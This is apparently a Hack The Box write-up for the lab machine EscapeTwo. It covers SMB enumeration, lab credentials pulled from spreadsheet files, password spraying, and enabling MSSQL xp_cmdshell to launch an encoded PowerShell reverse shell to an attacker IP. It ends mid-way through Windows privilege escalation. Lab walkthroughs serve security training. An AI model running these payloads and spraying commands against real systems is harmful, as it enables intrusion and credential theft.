Hack The Box Write-Up EscapeTwo - 10.10.11.51
About EscapeTwo
In this post, I’m writing a write-up for the machine EscapeTwo from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
EscapeTwo is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.
As is common in real life Windows pentests, we will start this box with credentials for the following account:
| Username | Password |
| rose | KxEPkKe6R8su |
Foothold
We start this machine with the credentials of the user account rose. So, we already have a foothold on this machine. This user has permission to access the SMB share Accounting Department. This share holds the two corrupted Excel files, accounting_2024.xlsx and accounts.xlsx. After changing these file extensions to .zip and extracting these files, we can find more usernames and passwords of user accounts. After a password spraying attack, we can move lateral from rose to sa and establish a more persistent connection on this machine.
User
With the user account sa we can connect to MSSQL and enable xp_cmdshell. With xp_cmdshell we can establish a reverse shell to our attacker machine. In the reverse shell, we are connected as the user account sql_svc. In the file C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI we can find the password for this user account. With net user we also found two new users ryan and ca_svc on this machine. After doing again a password spraying attack we can confirm the password of ryan and establish a shell with evil-winrm on this machine to read the users.txt.
Root
Using Bloodhound, we discovered that the user account ryan has full control over the ca_svc user account. We can also confirm that this machine is not only a Domain Controller and Database Server but also a Certificate Authority, which is not a recommended configuration. With this permission, we took control of the ca_svc user account, changed its password, and checked for any vulnerable certificate templates using certipy. We found that the template DunderMifflinAuthentication is vulnerable because the ca_svc user account has full control over it, making this server susceptible to the so-called ESC4 attack. Through the ESC4 attack, we requested a domain admin certificate, and with the hash of this user account, we can perform a pass-the-hash attack using evil-winrm to gain root access to this machine.
Machine Info
| Machine Name: | EscapeTwo |
| Difficulty: | Easy |
| Points: | 20 |
| Release Date: | 11 Jan 2025 |
| IP: | 10.10.11.51 |
| Creator: | ruycr4ft & Llo0zy |
Reconnaissance
Portscan with Nmap
As always, we start this machine with a portscan with Nmap.
1
sudo nmap -sC -sV -oA ./nmap/escapetwo escapetwo.htb
The results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# Nmap 7.94SVN scan initiated Sat May 17 15:50:32 2025 as: nmap -sC -sV -oA ./nmap/escapetwo.htb escapetwo.htb
Nmap scan report for escapetwo.htb (10.10.11.51)
Host is up (0.029s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-17 13:52:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-17T10:23:29
|_Not valid after: 2055-05-17T10:23:29
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1m34s, deviation: 0s, median: 1m34s
| date: 2025-05-17T13:53:01
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 17 15:52:04 2025 -- 1 IP address (1 host up) scanned in 91.95 seconds
The Nmap scan reveals that this server acts as a Domain Controller with the hostname DC01.SEQUEL.htb. Along with the default Domain Controller ports, we see that port 1433/tcp is open on this server. It’s not a recommended configuration to run Microsoft SQL along with Active Directory on the same server. This configuration can be interesting for owning this machine. First, we adding the hostname dc01.sequel.htb to our hosts file, and point it to the machine ip-address.
Enumeration
SMB
As we have user credentials, let’s start by enumerating the SMB protocol on port 445/tcp.
1
2
3
4
5
6
7
8
9
10
11
12
[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #smbmap -H dc01.sequel.htb -u rose -p 'KxEPkKe6R8su'
[+] IP: dc01.sequel.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
Accounting Department READ ONLY
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
We have several shared directories we can access. The Accounting Department is a promising one. We can check that one further. Also, the shares Users and SYSVOL are interesting. That last one can reveal scripts with more credentials or give us more information about the enforced domain policies.
Let’s start enumerating the Accounting Department share by connecting to it with the credentials from the user account rose.
1
2
3
4
5
6
7
8
9
10
11
sudo smbclient //dc01.sequel.htb/'Accounting Department' -U 'sequel/rose'
Password for [SEQUEL\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 12:52:21 2024
.. D 0 Sun Jun 9 12:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 12:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 12:52:07 2024
6367231 blocks of size 4096. 927332 blocks available
smb: \>
This share holds two files accounting_2024.xlsx and accounting.xlsx. We download these files to our attacking machine.
1
2
3
4
5
smb: \> mget *
Get file accounting_2024.xlsx? y
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (63,1 KiloBytes/sec) (average 63,1 KiloBytes/sec)
Get file accounts.xlsx? y
getting file \accounts.xlsx of size 6780 as accounts.xlsx (34,3 KiloBytes/sec) (average 47,3 KiloBytes/sec)
We check the Users share.
1
2
3
4
5
6
7
8
9
10
11
12
[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ # sudo smbclient //dc01.sequel.htb/Users -U 'sequel/rose'
Password for [SEQUEL\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Jun 9 15:42:11 2024
.. DR 0 Sun Jun 9 15:42:11 2024
Default DHR 0 Sun Jun 9 13:17:29 2024
desktop.ini AHS 174 Sat Sep 15 09:16:48 2018
6367231 blocks of size 4096. 927299 blocks available
smb: \>
We have the directory Default. The contents of this directory will be applied to every newly created user account. I have quickly checked the contents of this directory and found nothing useful at this moment. We keep this folder on our foreheads, as it can be useful in the future.
Let’s examine the downloaded xlsx files. First, I tried to open them with Microsoft Excel and LibreOffice Calc, but I saw only gibberish data. It seems that these files are corrupted.
1
2
3
4
5
6
[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ # file accounting_2024.xlsx
accounting_2024.xlsx: Zip archive data, made by v4.5, extract using at least v2.0, last modified, last modified Sun, Jan 01 1980 00:00:00, uncompressed size 1284, method=deflate
[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ # file accounts.xlsx
accounts.xlsx: Zip archive data, made by v2.0, extract using at least v2.0, last modified, last modified Sun, Jun 09 2024 10:47:44, uncompressed size 681, method=deflate
Using the file command, we can check these files, which are archived files. Therefore, we can change the file extension from xlsx to zip, extract these zip files, and examine the extracted directories and files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #sudo mv accounting_2024.xlsx accounting_2024.zip && sudo mv accounts.xlsx accounts.zip
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #sudo unzip accounts.zip
Archive: accounts.zip
file #1: bad zipfile offset (local header sig): 0
inflating: xl/workbook.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/sharedStrings.xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: docProps/custom.xml
inflating: [Content_Types].xml
After the extraction, we have the following folder structure:
DocProps: This directory contains metadata about the Excel workbook. It typically includes two files:core.xml(title, author, subject, and creation/modification dates, andapp.xml(application-specific properties).xl: This directory contains the main content of the Excel workbook, including such as worksheets and styling._rels: This directory contains relationship files that define how different parts of the document are related to each other.
For us, the xl directory is interesting. This directory holds the actual file contents in XML format.
We can find additional usernames in the file sheet.xml.
1
2
3
4
5
6
<hyperlinks>
<hyperlink ref="C2" r:id="rId1" display="[email protected]" />
<hyperlink ref="C3" r:id="rId2" display="[email protected]" />
<hyperlink ref="C4" r:id="rId3" display="[email protected]" />
<hyperlink ref="C5" r:id="rId4" display="[email protected]" />
</hyperlinks>
We already know that the Microsoft SQL port 1433/tcp is open, and we have now confirmed that the user account [email protected] exists. We can now unzip accounting_2024.zip.
Discovering additional credentials
We can search the files for passwords with the command grep. We search the files recursive for the following words:
- Password
- password
- credentials
1
2
3
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo/accounts]
└──╼ #grep -lre 'Password' -e 'password' -e 'credentials'
xl/sharedStrings.xml
It seems that the file xl/sharedStrings.xml contains this words, let’s read that file.
1
2
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo/accounts/xl]
└──╼ #cat sharedStrings.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
<si>
<t xml:space="preserve">First Name</t>
</si>
<si>
<t xml:space="preserve">Last Name</t>
</si>
<si>
<t xml:space="preserve">Email</t>
</si>
<si>
<t xml:space="preserve">Username</t>
</si>
<si>
<t xml:space="preserve">Password</t>
</si>
<si>
<t xml:space="preserve">Angela</t>
</si>
<si>
<t xml:space="preserve">Martin</t>
</si>
<si>
<t xml:space="preserve">[email protected]</t>
</si>
<si>
<t xml:space="preserve">angela</t>
</si>
<si>
<t xml:space="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xml:space="preserve">Oscar</t>
</si>
<si>
<t xml:space="preserve">Martinez</t>
</si>
<si>
<t xml:space="preserve">[email protected]</t>
</si>
<si>
<t xml:space="preserve">oscar</t>
</si>
<si>
<t xml:space="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xml:space="preserve">Kevin</t>
</si>
<si>
<t xml:space="preserve">Malone</t>
</si>
<si>
<t xml:space="preserve">[email protected]</t>
</si>
<si>
<t xml:space="preserve">kevin</t>
</si>
<si>
<t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
</si>
<si>
<t xml:space="preserve">NULL</t>
</si>
<si>
<t xml:space="preserve">[email protected]</t>
</si>
<si>
<t xml:space="preserve">sa</t>
</si>
<si>
<t xml:space="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>
We found the following usernames and passwords:
| Username | Password |
| angela | fwz7Q4mSpurIt99 |
| oscar | 86LxLBMgEWaKUnBG |
| kevin | Md9Wlq1E5bZnVDVo |
| sa | MSSQLP@ssw0rd! |
Nice! We now have additional passwords.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #sudo unzip accounting_2024.zip
Archive: accounting_2024.zip
file #1: bad zipfile offset (local header sig): 0
inflating: _rels/.rels
inflating: xl/workbook.xml
inflating: xl/_rels/workbook.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/sharedStrings.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/printerSettings/printerSettings1.bin
inflating: docProps/core.xml
inflating: docProps/app.xml
I checked the files, but I didn’t find anything useful. I have placed all the found usernames in the file users.txt and the passwords in passwords.txt. We can now perform a password spraying attack to determine which usernames and passwords are working and, if successful, identify the services to which the user accounts have access.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #nxc smb 10.10.11.51 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [-] sequel.htb\angela:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\kevin:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\sa:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\rose:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\angela:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\oscar:86LxLBMgEWaKUnBG
SMB 10.10.11.51 445 DC01 [-] sequel.htb\kevin:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE
...
SMB 10.10.11.51 445 DC01 [-] sequel.htb\angela:KxEPkKe6R8su STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\kevin:KxEPkKe6R8su STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\sa:KxEPkKe6R8su STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
We have confirmed that the password for the user account oscar is correct and that this user account has access to the file shares. I checked the file shares with this user account, but Oscar does not have any additional permissions beyond what we already had through Rose. Let’s check MSSQL in the same manner.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #nxc mssql 10.10.11.51 -u users.txt -p passwords.txt --continue-on-success --local-auth
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [-] DC01\angela:fwz7Q4mSpurIt99 (Login failed for user 'angela'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\oscar:fwz7Q4mSpurIt99 (Login failed for user 'oscar'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\kevin:fwz7Q4mSpurIt99 (Login failed for user 'kevin'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\sa:fwz7Q4mSpurIt99 (Login failed for user 'sa'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\rose:fwz7Q4mSpurIt99 (Login failed for user 'rose'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\angela:86LxLBMgEWaKUnBG (Login failed for user 'angela'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\oscar:86LxLBMgEWaKUnBG (Login failed for user 'oscar'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\kevin:86LxLBMgEWaKUnBG (Login failed for user 'kevin'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\sa:86LxLBMgEWaKUnBG (Login failed for user 'sa'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\rose:86LxLBMgEWaKUnBG (Login failed for user 'rose'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\angela:Md9Wlq1E5bZnVDVo (Login failed for user 'angela'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\oscar:Md9Wlq1E5bZnVDVo (Login failed for user 'oscar'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\kevin:Md9Wlq1E5bZnVDVo (Login failed for user 'kevin'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\sa:Md9Wlq1E5bZnVDVo (Login failed for user 'sa'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\rose:Md9Wlq1E5bZnVDVo (Login failed for user 'rose'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\angela:MSSQLP@ssw0rd! (Login failed for user 'angela'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\oscar:MSSQLP@ssw0rd! (Login failed for user 'oscar'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [-] DC01\kevin:MSSQLP@ssw0rd! (Login failed for user 'kevin'. Please try again with or without '--local-auth')
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
We have confirmed that the password for the sa user is working for the MSSQL service.
Lateral Movement
From rose to sa
MSSQL has a extended stored procedures called
xp_cmdshellwhich allow us to execute system commands using SQL.
Let’s connect to the sa user account on the MSSQL server on port 1433/tcp. After checking if xp_cmdshell is enabled, we found that this feature is not yet enabled. After enabling it with the command enable_xp_cmdshell, we can execute the command whoami.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #impacket-mssqlclient 'sequel.htb/sa:MSSQLP@[email protected]'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (sa dbo@master)> EXECUTE sp_configure 'show advanced options', 1
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> RECONFIGURE
SQL (sa dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> RECONFIGURE
QL (sa dbo@master)> EXEC xp_cmdshell 'whoami'
output
--------------
sequel\sql_svc
NULL
Let’s establish a reverse shell to our attacker machine.
1
SQL (sa dbo@master)> EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA2ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
Reverse shell is up and running, we are connected with the user account sql_svc.
1
2
3
4
5
6
7
8
9
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.76] from (UNKNOWN) [10.10.11.51] 61036
PS C:\Windows\system32> hostname; whoami
DC01
sequel\sql_svc
PS C:\Windows\system32>
In the directory C:\SQL2019\ExpressAdv_ENU we found a file named sql-Configuration.INI. Reading this file reveals the password for the user account sql_svc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
PS C:\SQL2019\ExpressAdv_ENU>
In the C:\Users directory we can see that there is also a user account named ryan.
1
2
3
4
5
6
7
8
9
10
11
12
PS C:\Users> ls
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/25/2024 3:10 AM Administrator
d-r--- 6/9/2024 4:11 AM Public
d----- 6/9/2024 4:15 AM ryan
d----- 6/8/2024 4:16 PM sql_svc
Let’s confirm if his user account indeed exists on this machine, and check whether there are more user accounts on this machine.
1
2
3
4
5
6
7
8
9
PS C:\Users> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator ca_svc Guest
krbtgt michael oscar
rose ryan sql_svc
The command completed with one or more errors.
We can not only confirm the existance of the user account ryan, we have also found a new user account ca_svc. This server functions not only as a Domain Controller and Database Server but also as a Certificate Authority. What could possibly go wrong? :-)
I added the new founded usernames to the users.txt file and the password to the passwords.txt file and let’s try to password spray again.
1
2
3
4
5
6
7
8
9
10
11
12
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #nxc winrm sequel.htb -u users.txt -p passwords.txt --continue-on-success
...
WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\ryan:0fwz7Q4mSpurIt99
WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\angela:WqSZAF6CysDQbGb3
WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3
WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\kevin:WqSZAF6CysDQbGb3
WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3
WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\rose:WqSZAF6CysDQbGb3
WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\ca_svc:WqSZAF6CysDQbGb3
WINRM 10.10.11.51 5985 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)
from sql_svc to ryan
The user account ryan has access to the WinRM service. We can now use evil-winrm to obtain a persistent shell on this machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #evil-winrm -u ryan -p 'WqSZAF6CysDQbGb3' -i sequel.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Desktop> hostname;whoami
DC01
sequel\ryan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\ryan> cd Desktop
*Evil-WinRM* PS C:\Users\ryan\Desktop> ls
Directory: C:\Users\ryan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/2/2025 9:02 PM 34 user.txt
*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
50de8f3a9181478a9b748b18e2e246ef
Privilege Escalation
Enumeration
Always start with the whoami /priv command, but no interesting permissions were found there.
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
First, let’s take a step back and take our dog out for a walk.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
